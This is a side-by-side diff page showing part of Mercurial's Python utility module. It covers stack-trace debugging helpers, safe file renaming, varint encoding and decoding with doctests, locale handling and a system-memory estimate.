3489 def add(self, source, hook):
3500 def add(self, source, hook):
3490 self._hooks.append((source, hook))
3501 self._hooks.append((source, hook))
3491
3502
3492 def __call__(self, *args):
3503 def __call__(self, *args):
3493 self._hooks.sort(key=lambda x: x[0])
3504 self._hooks.sort(key=lambda x: x[0])
3494 results = []
3505 results = []
3495 for source, hook in self._hooks:
3506 for source, hook in self._hooks:
3496 results.append(hook(*args))
3507 results.append(hook(*args))
3497 return results
3508 return results
3498
3509
3499
3510
3500 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3511 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3501 """Yields lines for a nicely formatted stacktrace.
3512 """Yields lines for a nicely formatted stacktrace.
3502 Skips the 'skip' last entries, then return the last 'depth' entries.
3513 Skips the 'skip' last entries, then return the last 'depth' entries.
3503 Each file+linenumber is formatted according to fileline.
3514 Each file+linenumber is formatted according to fileline.
3504 Each line is formatted according to line.
3515 Each line is formatted according to line.
3505 If line is None, it yields:
3516 If line is None, it yields:
3506 length of longest filepath+line number,
3517 length of longest filepath+line number,
3507 filepath+linenumber,
3518 filepath+linenumber,
3508 function
3519 function
3509
3520
3510 Not be used in production code but very convenient while developing.
3521 Not be used in production code but very convenient while developing.
3511 """
3522 """
3512 entries = [
3523 entries = [
3513 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3524 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3514 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3525 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3515 ][-depth:]
3526 ][-depth:]
3516 if entries:
3527 if entries:
3517 fnmax = max(len(entry[0]) for entry in entries)
3528 fnmax = max(len(entry[0]) for entry in entries)
3518 for fnln, func in entries:
3529 for fnln, func in entries:
3519 if line is None:
3530 if line is None:
3520 yield (fnmax, fnln, func)
3531 yield (fnmax, fnln, func)
3521 else:
3532 else:
3522 yield line % (fnmax, fnln, func)
3533 yield line % (fnmax, fnln, func)
3523
3534
3524
3535
3525 def debugstacktrace(
3536 def debugstacktrace(
3526 msg=b'stacktrace',
3537 msg=b'stacktrace',
3527 skip=0,
3538 skip=0,
3528 f=procutil.stderr,
3539 f=procutil.stderr,
3529 otherf=procutil.stdout,
3540 otherf=procutil.stdout,
3530 depth=0,
3541 depth=0,
3531 prefix=b'',
3542 prefix=b'',
3532 ):
3543 ):
3533 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3544 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3534 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3545 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3535 By default it will flush stdout first.
3546 By default it will flush stdout first.
3536 It can be used everywhere and intentionally does not require an ui object.
3547 It can be used everywhere and intentionally does not require an ui object.
3537 Not be used in production code but very convenient while developing.
3548 Not be used in production code but very convenient while developing.
3538 """
3549 """
3539 if otherf:
3550 if otherf:
3540 otherf.flush()
3551 otherf.flush()
3541 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3552 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3542 for line in getstackframes(skip + 1, depth=depth):
3553 for line in getstackframes(skip + 1, depth=depth):
3543 f.write(prefix + line)
3554 f.write(prefix + line)
3544 f.flush()
3555 f.flush()
3545
3556
3546
3557
3547 # convenient shortcut
3558 # convenient shortcut
3548 dst = debugstacktrace
3559 dst = debugstacktrace
3549
3560
3550
3561
3551 def safename(f, tag, ctx, others=None):
3562 def safename(f, tag, ctx, others=None):
3552 """
3563 """
3553 Generate a name that it is safe to rename f to in the given context.
3564 Generate a name that it is safe to rename f to in the given context.
3554
3565
3555 f: filename to rename
3566 f: filename to rename
3556 tag: a string tag that will be included in the new name
3567 tag: a string tag that will be included in the new name
3557 ctx: a context, in which the new name must not exist
3568 ctx: a context, in which the new name must not exist
3558 others: a set of other filenames that the new name must not be in
3569 others: a set of other filenames that the new name must not be in
3559
3570
3560 Returns a file name of the form oldname~tag[~number] which does not exist
3571 Returns a file name of the form oldname~tag[~number] which does not exist
3561 in the provided context and is not in the set of other names.
3572 in the provided context and is not in the set of other names.
3562 """
3573 """
3563 if others is None:
3574 if others is None:
3564 others = set()
3575 others = set()
3565
3576
3566 fn = b'%s~%s' % (f, tag)
3577 fn = b'%s~%s' % (f, tag)
3567 if fn not in ctx and fn not in others:
3578 if fn not in ctx and fn not in others:
3568 return fn
3579 return fn
3569 for n in itertools.count(1):
3580 for n in itertools.count(1):
3570 fn = b'%s~%s~%s' % (f, tag, n)
3581 fn = b'%s~%s~%s' % (f, tag, n)
3571 if fn not in ctx and fn not in others:
3582 if fn not in ctx and fn not in others:
3572 return fn
3583 return fn
3573
3584
3574
3585
3575 def readexactly(stream, n):
3586 def readexactly(stream, n):
3576 '''read n bytes from stream.read and abort if less was available'''
3587 '''read n bytes from stream.read and abort if less was available'''
3577 s = stream.read(n)
3588 s = stream.read(n)
3578 if len(s) < n:
3589 if len(s) < n:
3579 raise error.Abort(
3590 raise error.Abort(
3580 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3591 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3581 % (len(s), n)
3592 % (len(s), n)
3582 )
3593 )
3583 return s
3594 return s
3584
3595
3585
3596
3586 def uvarintencode(value):
3597 def uvarintencode(value):
3587 """Encode an unsigned integer value to a varint.
3598 """Encode an unsigned integer value to a varint.
3588
3599
3589 A varint is a variable length integer of 1 or more bytes. Each byte
3600 A varint is a variable length integer of 1 or more bytes. Each byte
3590 except the last has the most significant bit set. The lower 7 bits of
3601 except the last has the most significant bit set. The lower 7 bits of
3591 each byte store the 2's complement representation, least significant group
3602 each byte store the 2's complement representation, least significant group
3592 first.
3603 first.
3593
3604
3594 >>> uvarintencode(0)
3605 >>> uvarintencode(0)
3595 '\\x00'
3606 '\\x00'
3596 >>> uvarintencode(1)
3607 >>> uvarintencode(1)
3597 '\\x01'
3608 '\\x01'
3598 >>> uvarintencode(127)
3609 >>> uvarintencode(127)
3599 '\\x7f'
3610 '\\x7f'
3600 >>> uvarintencode(1337)
3611 >>> uvarintencode(1337)
3601 '\\xb9\\n'
3612 '\\xb9\\n'
3602 >>> uvarintencode(65536)
3613 >>> uvarintencode(65536)
3603 '\\x80\\x80\\x04'
3614 '\\x80\\x80\\x04'
3604 >>> uvarintencode(-1)
3615 >>> uvarintencode(-1)
3605 Traceback (most recent call last):
3616 Traceback (most recent call last):
3606 ...
3617 ...
3607 ProgrammingError: negative value for uvarint: -1
3618 ProgrammingError: negative value for uvarint: -1
3608 """
3619 """
3609 if value < 0:
3620 if value < 0:
3610 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3621 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3611 bits = value & 0x7F
3622 bits = value & 0x7F
3612 value >>= 7
3623 value >>= 7
3613 bytes = []
3624 bytes = []
3614 while value:
3625 while value:
3615 bytes.append(pycompat.bytechr(0x80 | bits))
3626 bytes.append(pycompat.bytechr(0x80 | bits))
3616 bits = value & 0x7F
3627 bits = value & 0x7F
3617 value >>= 7
3628 value >>= 7
3618 bytes.append(pycompat.bytechr(bits))
3629 bytes.append(pycompat.bytechr(bits))
3619
3630
3620 return b''.join(bytes)
3631 return b''.join(bytes)
3621
3632
3622
3633
3623 def uvarintdecodestream(fh):
3634 def uvarintdecodestream(fh):
3624 """Decode an unsigned variable length integer from a stream.
3635 """Decode an unsigned variable length integer from a stream.
3625
3636
3626 The passed argument is anything that has a ``.read(N)`` method.
3637 The passed argument is anything that has a ``.read(N)`` method.
3627
3638
3628 >>> try:
3639 >>> try:
3629 ... from StringIO import StringIO as BytesIO
3640 ... from StringIO import StringIO as BytesIO
3630 ... except ImportError:
3641 ... except ImportError:
3631 ... from io import BytesIO
3642 ... from io import BytesIO
3632 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3643 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3633 0
3644 0
3634 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3645 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3635 1
3646 1
3636 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3647 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3637 127
3648 127
3638 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3649 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3639 1337
3650 1337
3640 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3651 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3641 65536
3652 65536
3642 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3653 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3643 Traceback (most recent call last):
3654 Traceback (most recent call last):
3644 ...
3655 ...
3645 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3656 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3646 """
3657 """
3647 result = 0
3658 result = 0
3648 shift = 0
3659 shift = 0
3649 while True:
3660 while True:
3650 byte = ord(readexactly(fh, 1))
3661 byte = ord(readexactly(fh, 1))
3651 result |= (byte & 0x7F) << shift
3662 result |= (byte & 0x7F) << shift
3652 if not (byte & 0x80):
3663 if not (byte & 0x80):
3653 return result
3664 return result
3654 shift += 7
3665 shift += 7
3655
3666
3656
3667
3657 # Passing the '' locale means that the locale should be set according to the
3668 # Passing the '' locale means that the locale should be set according to the
3658 # user settings (environment variables).
3669 # user settings (environment variables).
3659 # Python sometimes avoids setting the global locale settings. When interfacing
3670 # Python sometimes avoids setting the global locale settings. When interfacing
3660 # with C code (e.g. the curses module or the Subversion bindings), the global
3671 # with C code (e.g. the curses module or the Subversion bindings), the global
3661 # locale settings must be initialized correctly. Python 2 does not initialize
3672 # locale settings must be initialized correctly. Python 2 does not initialize
3662 # the global locale settings on interpreter startup. Python 3 sometimes
3673 # the global locale settings on interpreter startup. Python 3 sometimes
3663 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3674 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3664 # explicitly initialize it to get consistent behavior if it's not already
3675 # explicitly initialize it to get consistent behavior if it's not already
3665 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3676 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3666 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3677 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3667 # if we can remove this code.
3678 # if we can remove this code.
3668 @contextlib.contextmanager
3679 @contextlib.contextmanager
3669 def with_lc_ctype():
3680 def with_lc_ctype():
3670 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3681 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3671 if oldloc == 'C':
3682 if oldloc == 'C':
3672 try:
3683 try:
3673 try:
3684 try:
3674 locale.setlocale(locale.LC_CTYPE, '')
3685 locale.setlocale(locale.LC_CTYPE, '')
3675 except locale.Error:
3686 except locale.Error:
3676 # The likely case is that the locale from the environment
3687 # The likely case is that the locale from the environment
3677 # variables is unknown.
3688 # variables is unknown.
3678 pass
3689 pass
3679 yield
3690 yield
3680 finally:
3691 finally:
3681 locale.setlocale(locale.LC_CTYPE, oldloc)
3692 locale.setlocale(locale.LC_CTYPE, oldloc)
3682 else:
3693 else:
3683 yield
3694 yield
3684
3695
3685
3696
3686 def _estimatememory():
3697 def _estimatememory():
3687 # type: () -> Optional[int]
3698 # type: () -> Optional[int]
3688 """Provide an estimate for the available system memory in Bytes.
3699 """Provide an estimate for the available system memory in Bytes.
3689
3700
3690 If no estimate can be provided on the platform, returns None.
3701 If no estimate can be provided on the platform, returns None.
3691 """
3702 """
3692 if pycompat.sysplatform.startswith(b'win'):
3703 if pycompat.sysplatform.startswith(b'win'):
3693 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3704 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3694 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3705 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3695 from ctypes.wintypes import ( # pytype: disable=import-error
3706 from ctypes.wintypes import ( # pytype: disable=import-error
3696 Structure,
3707 Structure,
3697 byref,
3708 byref,
3698 sizeof,
3709 sizeof,
3699 windll,
3710 windll,
3700 )
3711 )
3701
3712
3702 class MEMORYSTATUSEX(Structure):
3713 class MEMORYSTATUSEX(Structure):
3703 _fields_ = [
3714 _fields_ = [
3704 ('dwLength', DWORD),
3715 ('dwLength', DWORD),
3705 ('dwMemoryLoad', DWORD),
3716 ('dwMemoryLoad', DWORD),
3706 ('ullTotalPhys', DWORDLONG),
3717 ('ullTotalPhys', DWORDLONG),
3707 ('ullAvailPhys', DWORDLONG),
3718 ('ullAvailPhys', DWORDLONG),
3708 ('ullTotalPageFile', DWORDLONG),
3719 ('ullTotalPageFile', DWORDLONG),
3709 ('ullAvailPageFile', DWORDLONG),
3720 ('ullAvailPageFile', DWORDLONG),
3710 ('ullTotalVirtual', DWORDLONG),
3721 ('ullTotalVirtual', DWORDLONG),
3711 ('ullAvailVirtual', DWORDLONG),
3722 ('ullAvailVirtual', DWORDLONG),
3712 ('ullExtendedVirtual', DWORDLONG),
3723 ('ullExtendedVirtual', DWORDLONG),
3713 ]
3724 ]
3714
3725
3715 x = MEMORYSTATUSEX()
3726 x = MEMORYSTATUSEX()
3716 x.dwLength = sizeof(x)
3727 x.dwLength = sizeof(x)
3717 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3728 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3718 return x.ullAvailPhys
3729 return x.ullAvailPhys
3719
3730
3720 # On newer Unix-like systems and Mac OSX, the sysconf interface
3731 # On newer Unix-like systems and Mac OSX, the sysconf interface
3721 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3732 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3722 # seems to be implemented on most systems.
3733 # seems to be implemented on most systems.
3723 try:
3734 try:
3724 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3735 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3725 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3736 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3726 return pagesize * pages
3737 return pagesize * pages
3727 except OSError: # sysconf can fail
3738 except OSError: # sysconf can fail
3728 pass
3739 pass
3729 except KeyError: # unknown parameter
3740 except KeyError: # unknown parameter
3730 pass
3741 pass
General Comments 0
You need to be logged in to leave comments. Login now